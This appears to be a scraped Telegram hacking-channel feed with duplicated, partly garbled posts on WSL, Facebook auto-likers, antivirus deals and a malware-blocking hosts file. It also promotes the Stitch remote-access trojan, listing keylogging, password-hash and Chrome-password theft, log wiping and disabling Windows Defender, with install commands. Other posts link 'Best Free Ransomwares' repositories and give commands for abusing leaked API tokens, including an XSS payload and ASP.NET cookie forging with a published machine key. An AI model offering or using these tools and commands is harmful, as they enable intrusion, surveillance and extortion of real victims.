Forwarded from UNDERCODE NEWS
Be aware from this new variant of the Mykings botnet is remotely controlled via PcShare
#Malwares
#Malwares
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is WSL for? What are the limitations of WSL2 (Windows Subsystem for Linux)
1) we are not actually installing Kali Linux
in fact we don't install Linux at all
2) The Windows Subsystem for Linux is NOT a virtual machine
and is NOT real Linux. If you understand what Wine is (which is also not an emulator), then WSL2 is also a Wine in reverse. WSL2 is simply trying to serve as a Linux kernel to the best of its ability for GNU applications, without being a true Linux kernel.
π¦What does this mean from a practical point of view?
1) This means that we get a very similar situation with Wine, which tries to perform Windows functions (again, to the best of its ability) - something will work fine, something will work with errors, and something will not work at all. ...
2) In WSL2, 100% will not work (in the coming years, and maybe never at all)
absolutely all wireless attacks (Wi-Fi, Bluetooth)
3) Hashcat and other programs using video cards to perform computations (brute force)
4) low-level access to USB devices (for example, to make an image of a disk / flash drive for forensic research)
background server applications
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦What is WSL for? What are the limitations of WSL2 (Windows Subsystem for Linux)
1) we are not actually installing Kali Linux
in fact we don't install Linux at all
2) The Windows Subsystem for Linux is NOT a virtual machine
and is NOT real Linux. If you understand what Wine is (which is also not an emulator), then WSL2 is also a Wine in reverse. WSL2 is simply trying to serve as a Linux kernel to the best of its ability for GNU applications, without being a true Linux kernel.
π¦What does this mean from a practical point of view?
1) This means that we get a very similar situation with Wine, which tries to perform Windows functions (again, to the best of its ability) - something will work fine, something will work with errors, and something will not work at all. ...
2) In WSL2, 100% will not work (in the coming years, and maybe never at all)
absolutely all wireless attacks (Wi-Fi, Bluetooth)
3) Hashcat and other programs using video cards to perform computations (brute force)
4) low-level access to USB devices (for example, to make an image of a disk / flash drive for forensic research)
background server applications
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦list 3 FACEBOOK LIKERS SITES & APPLICATIONS 2020 :
Wefbee.com
Hublaa.me
MachineLiker.com
Mg-likers.com
https://play.google.com/store/apps/details?id=com.swipa&hl=en
https://mylikelo.com/
https://apental.com/https://fb-liker.en.uptodown.com/android
https://apkpure.com/get-instant-likes/socials.com.application
https://swipa.me/
https://www.apkmart.net/app/fb-auto-liker/?fbclid=IwAR1sZed5ugP0jlNBAHJnr1CgkMTs8yTyz7QhbJstwx2kU2t4OOkI9VE3LXQ#.XhSFHVR-JjA.facebook
enjoy β€οΈππ»
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦list 3 FACEBOOK LIKERS SITES & APPLICATIONS 2020 :
Wefbee.com
Hublaa.me
MachineLiker.com
Mg-likers.com
https://play.google.com/store/apps/details?id=com.swipa&hl=en
https://mylikelo.com/
https://apental.com/https://fb-liker.en.uptodown.com/android
https://apkpure.com/get-instant-likes/socials.com.application
https://swipa.me/
https://www.apkmart.net/app/fb-auto-liker/?fbclid=IwAR1sZed5ugP0jlNBAHJnr1CgkMTs8yTyz7QhbJstwx2kU2t4OOkI9VE3LXQ#.XhSFHVR-JjA.facebook
enjoy β€οΈππ»
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Google Play
Swipa - The photo likes app - Apps on Google Play
The more photos you upload, the more likes you will get.
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST OFFERS & TRIALS NOW, IN ANTIVIRUS APPS FOR WINDOWS 2020 :
https://www.bitdefender.co.uk/media/html/consumer/new/100-vip-special-opt/?pid=vip_special_offer&cid=aff|c|ir&clickid=WqN2mZX1mxyOWzVwUx0Mo3EAUkiX3mRneUFAUA0&irgwc=1&MPid=221109&cid=aff%7Cc%7CIR
https://uk.norton.com/ps/4up_norton360_nav_ns_nd_np_Reading_tw_nb.html
https://www.avira.com/en/campaigns/acq/avpro/Techradar/av-pro-uk?x-c-channel=partnerize&x-a-medium=1100l10026&utm_source=partnerize&utm_medium=affiliate&utm_content=1100l52030&utm_term=futurepublishing&x-clickref=1011lbhuuLcX
https://www.trendmicro.com/en_gb/forHome/products/antivirus-plus.html?irclickid=QAe2DuSk8xyOUQF0M-0V7wD0UkiX3mTueUFAUA0&irgwc=1
https://www.kaspersky.co.uk/antivirus?sid=itproportal-gb-8824742738814738000&AID=12584495&PID=100134076&campaign=tcid_cj_12584495_100134076_cdb7fa2df43811ea83bd00790a180511_x5&CJ_CID=3486349&CJ_PID=100134076&CJ_CID_NAME=Future+Publishing+Ltd&utm_source=CJ&utm_medium=affiliate&CJEVENT=cdb7fa2df43811ea83bd00790a180511
https://www.amazon.com/s?tag=georiot-us-default-20&k=G+Data+Antivirus&ascsubtag=itproportal-row-7913326345896524000-20
https://www.webroot.com/gb/en/home?sc=70161000000TRru&rc=8200
https://www.eset.com/us/home/antivirus/?sid=hawk-custom-tracking&ref=AFC-CJ&attr=100134076&pub=11553473&shop=itproportal-row-6973904843495994000&utm_source=100134076&utm_medium=affiliate&utm_content=11553473&cjevent=0be11851f43911ea83bd00790a180511
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST OFFERS & TRIALS NOW, IN ANTIVIRUS APPS FOR WINDOWS 2020 :
https://www.bitdefender.co.uk/media/html/consumer/new/100-vip-special-opt/?pid=vip_special_offer&cid=aff|c|ir&clickid=WqN2mZX1mxyOWzVwUx0Mo3EAUkiX3mRneUFAUA0&irgwc=1&MPid=221109&cid=aff%7Cc%7CIR
https://uk.norton.com/ps/4up_norton360_nav_ns_nd_np_Reading_tw_nb.html
https://www.avira.com/en/campaigns/acq/avpro/Techradar/av-pro-uk?x-c-channel=partnerize&x-a-medium=1100l10026&utm_source=partnerize&utm_medium=affiliate&utm_content=1100l52030&utm_term=futurepublishing&x-clickref=1011lbhuuLcX
https://www.trendmicro.com/en_gb/forHome/products/antivirus-plus.html?irclickid=QAe2DuSk8xyOUQF0M-0V7wD0UkiX3mTueUFAUA0&irgwc=1
https://www.kaspersky.co.uk/antivirus?sid=itproportal-gb-8824742738814738000&AID=12584495&PID=100134076&campaign=tcid_cj_12584495_100134076_cdb7fa2df43811ea83bd00790a180511_x5&CJ_CID=3486349&CJ_PID=100134076&CJ_CID_NAME=Future+Publishing+Ltd&utm_source=CJ&utm_medium=affiliate&CJEVENT=cdb7fa2df43811ea83bd00790a180511
https://www.amazon.com/s?tag=georiot-us-default-20&k=G+Data+Antivirus&ascsubtag=itproportal-row-7913326345896524000-20
https://www.webroot.com/gb/en/home?sc=70161000000TRru&rc=8200
https://www.eset.com/us/home/antivirus/?sid=hawk-custom-tracking&ref=AFC-CJ&attr=100134076&pub=11553473&shop=itproportal-row-6973904843495994000&utm_source=100134076&utm_medium=affiliate&utm_content=11553473&cjevent=0be11851f43911ea83bd00790a180511
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Trend Micro
Antivirus Plus Security Software | Trend Micro
Shop, share, and play safely. Our protection blocks 250M+ threats daily and stops the latest threats, including ransomware, before they reach your PC.
malicious.link post snagging-creds-from-locked-machine.pdf
401.9 KB
First o, this is dead simple and shouldnβt work, but it does. Also, there is no possible way that Iβm the rst one that has identied this, but here it is (trust me, I tested it so many ways to conrm it because I couldnβt believe it was true) TL;DR USB Ethernet + DHCP + Responder == Creds ... #Full
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Top Execution logging and tracing tools :
(easy install)
* [Wireshark](https://www.wireshark.org/) - A free and open-source packet analyzer
* [tcpdump](http://www.tcpdump.org/) - A powerful command-line packet analyzer; and libpcap, a portable C/C++ library for network traffic capture
* [mitmproxy](https://github.com/mitmproxy/mitmproxy) - An interactive, SSL-capable man-in-the-middle proxy for HTTP with a console interface
* [Charles Proxy](https://charlesproxy.com) - A cross-platform GUI web debugging proxy to view intercepted HTTP and HTTPS/SSL live traffic
* [usbmon](https://www.kernel.org/doc/Documentation/usb/usbmon.txt) - USB capture for Linux.
* [USBPcap](https://github.com/desowin/usbpcap) - USB capture for Windows.
* [dynStruct](https://github.com/ampotos/dynStruct) - structures recovery via dynamic instrumentation.
* [drltrace](https://github.com/mxmssh/drltrace) - shared library calls tracing.
enjoy:)
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Top Execution logging and tracing tools :
(easy install)
* [Wireshark](https://www.wireshark.org/) - A free and open-source packet analyzer
* [tcpdump](http://www.tcpdump.org/) - A powerful command-line packet analyzer; and libpcap, a portable C/C++ library for network traffic capture
* [mitmproxy](https://github.com/mitmproxy/mitmproxy) - An interactive, SSL-capable man-in-the-middle proxy for HTTP with a console interface
* [Charles Proxy](https://charlesproxy.com) - A cross-platform GUI web debugging proxy to view intercepted HTTP and HTTPS/SSL live traffic
* [usbmon](https://www.kernel.org/doc/Documentation/usb/usbmon.txt) - USB capture for Linux.
* [USBPcap](https://github.com/desowin/usbpcap) - USB capture for Windows.
* [dynStruct](https://github.com/ampotos/dynStruct) - structures recovery via dynamic instrumentation.
* [drltrace](https://github.com/mxmssh/drltrace) - shared library calls tracing.
enjoy:)
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
www.tcpdump.org
Home | TCPDUMP & LIBPCAP
Web site of Tcpdump and Libpcap
Forwarded from UNDERCODE NEWS
Be aware of storing sensitive informations on SK Hynix and LG Electronics , both were hacked and 50GB confidential files were encrypted and extorted
#DataBreaches
#DataBreaches
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦DANGEROUS HACKING 2020
F E A T U R E S :
Cross Platform Support
Command and file auto-completion
Antivirus detection
Able to turn off/on display monitors
Hide/unhide files and directories
View/edit the hosts file
View all the systems environment variables
Keylogger with options to view status, start, stop and dump the logs onto your host system
View the location and other information of the target machine
Execute custom python scripts which return whatever you print to screen
Screenshots
Virtual machine detection
Download/Upload files to and from the target system
Attempt to dump the systems password hashes
Payloads' properties are "disguised" as other known programs
Display a user/password dialog box to obtain user password
Dump passwords saved via Chrome
Clear the System, Security, and Application logs
Enable/Disable services such as RDP,UAC, and Windows Defender
Edit the accessed, created, and modified properties of files
Create a custom popup box
View connected webcam and take snapshots
View past connected wifi connections along with their passwords
View information about drives connected
View summary of registry values such as DEP
Mac OSX Specific
Display a user/password dialog box to obtain user password
Change the login text at the user's login screen
Webcam snapshots
Mac OSX/Linux Specific
SSH from the target machine into another host
Run sudo commands
Attempt to bruteforce the user's password using the passwords list found in Tools/
Webcam snapshots? (untested on Linux)
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/nathanlopez/Stitch.git
2) cd Stitch
3) # for Windows
pip install -r win_requirements.txt
# for Mac OSX
pip install -r osx_requirements.txt
# for Linux
pip install -r lnx_requirements.txt
4) python main.py
U S E F O R L E A R N
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦DANGEROUS HACKING 2020
F E A T U R E S :
Cross Platform Support
Command and file auto-completion
Antivirus detection
Able to turn off/on display monitors
Hide/unhide files and directories
View/edit the hosts file
View all the systems environment variables
Keylogger with options to view status, start, stop and dump the logs onto your host system
View the location and other information of the target machine
Execute custom python scripts which return whatever you print to screen
Screenshots
Virtual machine detection
Download/Upload files to and from the target system
Attempt to dump the systems password hashes
Payloads' properties are "disguised" as other known programs
Display a user/password dialog box to obtain user password
Dump passwords saved via Chrome
Clear the System, Security, and Application logs
Enable/Disable services such as RDP,UAC, and Windows Defender
Edit the accessed, created, and modified properties of files
Create a custom popup box
View connected webcam and take snapshots
View past connected wifi connections along with their passwords
View information about drives connected
View summary of registry values such as DEP
Mac OSX Specific
Display a user/password dialog box to obtain user password
Change the login text at the user's login screen
Webcam snapshots
Mac OSX/Linux Specific
SSH from the target machine into another host
Run sudo commands
Attempt to bruteforce the user's password using the passwords list found in Tools/
Webcam snapshots? (untested on Linux)
πΈπ½π π π°π»π»πΈπ π°π πΈπΎπ½ & π π π½ :
1) git clone https://github.com/nathanlopez/Stitch.git
2) cd Stitch
3) # for Windows
pip install -r win_requirements.txt
# for Mac OSX
pip install -r osx_requirements.txt
# for Linux
pip install -r lnx_requirements.txt
4) python main.py
U S E F O R L E A R N
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - nathanlopez/Stitch: Python Remote Administration Tool (RAT)
Python Remote Administration Tool (RAT). Contribute to nathanlopez/Stitch development by creating an account on GitHub.
Forwarded from UNDERCODE NEWS
According to the .ru zone: why ransomware bypass the Russian domain
#Malwares
#Malwares
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST ANDROID VIDEO EDITOR 2020 :
https://play.google.com/store/apps/details?id=com.wondershare.filmorago
https://play.google.com/store/apps/details?id=com.adobe.premiereclip
https://play.google.com/store/apps/details?id=com.xvideostudio.videoeditor
https://play.google.com/store/apps/details?id=com.cyberlink.powerdirector.DRA140225_01
https://play.google.com/store/apps/details?id=com.nexstreaming.app.kinemasterfree
https://play.google.com/store/apps/details?id=com.stupeflix.replay
https://play.google.com/store/apps/details?id=com.quvideo.xiaoying
https://play.google.com/store/apps/details?id=com.avcrbt.funimate
https://play.google.com/store/apps/details?id=com.magisto
https://play.google.com/store/apps/details?id=com.alivestory.android.alive
https://play.google.com/store/apps/details?id=com.funcamerastudio.videomaker
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦BEST ANDROID VIDEO EDITOR 2020 :
https://play.google.com/store/apps/details?id=com.wondershare.filmorago
https://play.google.com/store/apps/details?id=com.adobe.premiereclip
https://play.google.com/store/apps/details?id=com.xvideostudio.videoeditor
https://play.google.com/store/apps/details?id=com.cyberlink.powerdirector.DRA140225_01
https://play.google.com/store/apps/details?id=com.nexstreaming.app.kinemasterfree
https://play.google.com/store/apps/details?id=com.stupeflix.replay
https://play.google.com/store/apps/details?id=com.quvideo.xiaoying
https://play.google.com/store/apps/details?id=com.avcrbt.funimate
https://play.google.com/store/apps/details?id=com.magisto
https://play.google.com/store/apps/details?id=com.alivestory.android.alive
https://play.google.com/store/apps/details?id=com.funcamerastudio.videomaker
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
Google Play
Filmora: AI Video Editor&Maker - Apps on Google Play
AI Video EditorοΌAI Music, Text to Video,Text to Speech,Auto Caption,Video Effect
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Best Free Ransomwares :
https://github.com/fabrimagic72/malware-samples
https://github.com/NYAN-x-CAT/Lime-RAT
https://github.com/mauri870/ransomware
https://github.com/deadPix3l/CryptSky
https://github.com/tarcisio-marinho/GonnaCry
https://github.com/sithis993/Crypter
https://github.com/wille/cry
https://github.com/NullArray/Cypher
https://github.com/leonv024/RAASNet
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦Best Free Ransomwares :
https://github.com/fabrimagic72/malware-samples
https://github.com/NYAN-x-CAT/Lime-RAT
https://github.com/mauri870/ransomware
https://github.com/deadPix3l/CryptSky
https://github.com/tarcisio-marinho/GonnaCry
https://github.com/sithis993/Crypter
https://github.com/wille/cry
https://github.com/NullArray/Cypher
https://github.com/leonv024/RAASNet
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - fabrimagic72/malware-samples: A collection of malware samples caught by several honeypots i manage
A collection of malware samples caught by several honeypots i manage - fabrimagic72/malware-samples
Forwarded from WEB UNDERCODE - PRIVATE
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦API Key Leaks 2020 :
1) Algolia
curl --request PUT \
--url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings \
--header 'content-type: application/json' \
--header 'x-algolia-api-key: <example-key>' \
--header 'x-algolia-application-id: <example-application-id>' \
--data '{"highlightPreTag": "<script>alert(1);</script>"}'
2) AWS Access Key ID & Secret
> git clone https://github.com/andresriancho/enumerate-iam
> cd enumerate-iam
.>./enumerate-iam.py --access-key AKIA... --secret-key X XX..
3) Slack API Token
> curl -sX POST "https://slack.com/api/auth.test?token=xoxp-TOKEN_HERE&pretty=1"
4) Facebook Access Token
curl https://developers.facebook.com/tools/debug/accesstoken/?access_token=ACCESS_TOKEN_HERE&version=v3.2
5) Github client id and client secret
curl 'https://api.github.com/users/whatever?client_id=xxxx&client_secret=yyyy'
6) Twilio Account_sid and Auth token
> curl -X GET 'https://api.twilio.com/2010-04-01/
> Accounts.json' -u ACCOUNT_SID:AUTH_TOKEN
7) Twitter API Secret
curl -u 'API key:API secret key' --data 'grant_type=client_credentials' 'https://api.twitter.com/oauth2/token'
8) Twitter Bearer Token
> curl --request GET --url https://api.twitter.com/1.1/account_activity/all/subscriptions/count.json --header 'authorization: Bearer TOKEN'
9) Gitlab Personal Access Token
curl "https://gitlab.example.com/api/v4/projects?private_token=<your_access_token>"
10) HockeyApp API Token
curl -H "X-HockeyAppToken: ad136912c642076b0d1f32ba161f1846b2c" https://rink.hockeyapp.net/api/2/apps/2021bdf2671ab09174c1de5ad147ea2ba4
11) Auth Bypass using pre-published Machine Key
By default, ASP.NET creates a Forms Authentication Ticket with unique a username associated with it, Date and Time at which the ticket was issued and expires. So, all you need is just a unique username and a machine key to create a forms authentication token
12) That machine key is used for encryption and decryption of forms authentication cookie data and view-state data, and for verification of out-of-process session state identification.
Example of a machineKey from https://docs.microsoft.com/en-us/iis/troubleshoot/security-issues/troubleshooting-forms-authentication.
<machineKey validationKey="87AC8F432C8DB844A4EFD024301AC1AB5808BEE9D1870689B63794D33EE3B55CDB315BB480721A107187561F388C6BEF5B623BF31E2E725FC3F3F71A32BA5DFC" decryptionKey="E001A307CCC8B1ADEA2C55B1246CDCFE8579576997FF92E7" validation="SHA1" />
Exploit with Blacklist3r
π¦ decrypt cookie :
$ AspDotNetWrapper.exe --keypath C:\MachineKey.txt --cookie XXXXXXX_XXXXX-XXXXX --decrypt --purpose=owin.cookie --valalgo=hmacsha512 --decalgo=aes
# encrypt cookie (edit Decrypted.txt)
$ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt
β git 2020
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦API Key Leaks 2020 :
1) Algolia
curl --request PUT \
--url https://<application-id>-1.algolianet.com/1/indexes/<example-index>/settings \
--header 'content-type: application/json' \
--header 'x-algolia-api-key: <example-key>' \
--header 'x-algolia-application-id: <example-application-id>' \
--data '{"highlightPreTag": "<script>alert(1);</script>"}'
2) AWS Access Key ID & Secret
> git clone https://github.com/andresriancho/enumerate-iam
> cd enumerate-iam
.>./enumerate-iam.py --access-key AKIA... --secret-key X XX..
3) Slack API Token
> curl -sX POST "https://slack.com/api/auth.test?token=xoxp-TOKEN_HERE&pretty=1"
4) Facebook Access Token
curl https://developers.facebook.com/tools/debug/accesstoken/?access_token=ACCESS_TOKEN_HERE&version=v3.2
5) Github client id and client secret
curl 'https://api.github.com/users/whatever?client_id=xxxx&client_secret=yyyy'
6) Twilio Account_sid and Auth token
> curl -X GET 'https://api.twilio.com/2010-04-01/
> Accounts.json' -u ACCOUNT_SID:AUTH_TOKEN
7) Twitter API Secret
curl -u 'API key:API secret key' --data 'grant_type=client_credentials' 'https://api.twitter.com/oauth2/token'
8) Twitter Bearer Token
> curl --request GET --url https://api.twitter.com/1.1/account_activity/all/subscriptions/count.json --header 'authorization: Bearer TOKEN'
9) Gitlab Personal Access Token
curl "https://gitlab.example.com/api/v4/projects?private_token=<your_access_token>"
10) HockeyApp API Token
curl -H "X-HockeyAppToken: ad136912c642076b0d1f32ba161f1846b2c" https://rink.hockeyapp.net/api/2/apps/2021bdf2671ab09174c1de5ad147ea2ba4
11) Auth Bypass using pre-published Machine Key
By default, ASP.NET creates a Forms Authentication Ticket with unique a username associated with it, Date and Time at which the ticket was issued and expires. So, all you need is just a unique username and a machine key to create a forms authentication token
12) That machine key is used for encryption and decryption of forms authentication cookie data and view-state data, and for verification of out-of-process session state identification.
Example of a machineKey from https://docs.microsoft.com/en-us/iis/troubleshoot/security-issues/troubleshooting-forms-authentication.
<machineKey validationKey="87AC8F432C8DB844A4EFD024301AC1AB5808BEE9D1870689B63794D33EE3B55CDB315BB480721A107187561F388C6BEF5B623BF31E2E725FC3F3F71A32BA5DFC" decryptionKey="E001A307CCC8B1ADEA2C55B1246CDCFE8579576997FF92E7" validation="SHA1" />
Exploit with Blacklist3r
π¦ decrypt cookie :
$ AspDotNetWrapper.exe --keypath C:\MachineKey.txt --cookie XXXXXXX_XXXXX-XXXXX --decrypt --purpose=owin.cookie --valalgo=hmacsha512 --decalgo=aes
# encrypt cookie (edit Decrypted.txt)
$ AspDotNetWrapper.exe --decryptDataFilePath C:\DecryptedText.txt
β git 2020
@UndercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦A hosts file for use on any operating system to block bad domains out of your servers or devices:
WHAT IS A HOSTS FILE?
1) A hosts file, named hosts (with no file extension), is a plain-text file used by all operating systems to map hostnames to IP addresses.
2) In most operating systems, the hosts file is preferential to DNS. Therefore if a domain name is resolved by the hosts file, the request never leaves your computer.
3) Having a smart hosts file goes a long way towards blocking malware, adware, ransomware, porn and other nuisance web sites.
4) A hosts file like this causes any lookups to any of the listed domains to resolve back to your localhost so it prevents any outgoing connections to the listed domains.
π¦WHERE DO I PUT THIS ON MY COMPUTER?
1) To modify your current hosts file, look for it in the following places and modify it with a text editor.
Linux, Mac OS X, iOS, Android: /etc/hosts folder.
2) Windows Systems: %SystemRoot%\system32\drivers\etc\hosts folder.
Β»DOWNLOAD FREE :
https://github.com/mitchellkrogza/Badd-Boyz-Hosts
enjoy β€οΈππ»
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
π¦A hosts file for use on any operating system to block bad domains out of your servers or devices:
WHAT IS A HOSTS FILE?
1) A hosts file, named hosts (with no file extension), is a plain-text file used by all operating systems to map hostnames to IP addresses.
2) In most operating systems, the hosts file is preferential to DNS. Therefore if a domain name is resolved by the hosts file, the request never leaves your computer.
3) Having a smart hosts file goes a long way towards blocking malware, adware, ransomware, porn and other nuisance web sites.
4) A hosts file like this causes any lookups to any of the listed domains to resolve back to your localhost so it prevents any outgoing connections to the listed domains.
π¦WHERE DO I PUT THIS ON MY COMPUTER?
1) To modify your current hosts file, look for it in the following places and modify it with a text editor.
Linux, Mac OS X, iOS, Android: /etc/hosts folder.
2) Windows Systems: %SystemRoot%\system32\drivers\etc\hosts folder.
Β»DOWNLOAD FREE :
https://github.com/mitchellkrogza/Badd-Boyz-Hosts
enjoy β€οΈππ»
@undercodeTesting
@UndercodeHacking
@UndercodeSecurity
β β β Uππ»βΊπ«Δπ¬πβ β β β
GitHub
GitHub - mitchellkrogza/Badd-Boyz-Hosts: A hosts file for use on any operating system to block bad domains out of your serversβ¦
A hosts file for use on any operating system to block bad domains out of your servers or devices. - mitchellkrogza/Badd-Boyz-Hosts
Forwarded from WEB UNDERCODE - PRIVATE
List of 100+ Cyber Security RSS Feeds.pdf
1.5 MB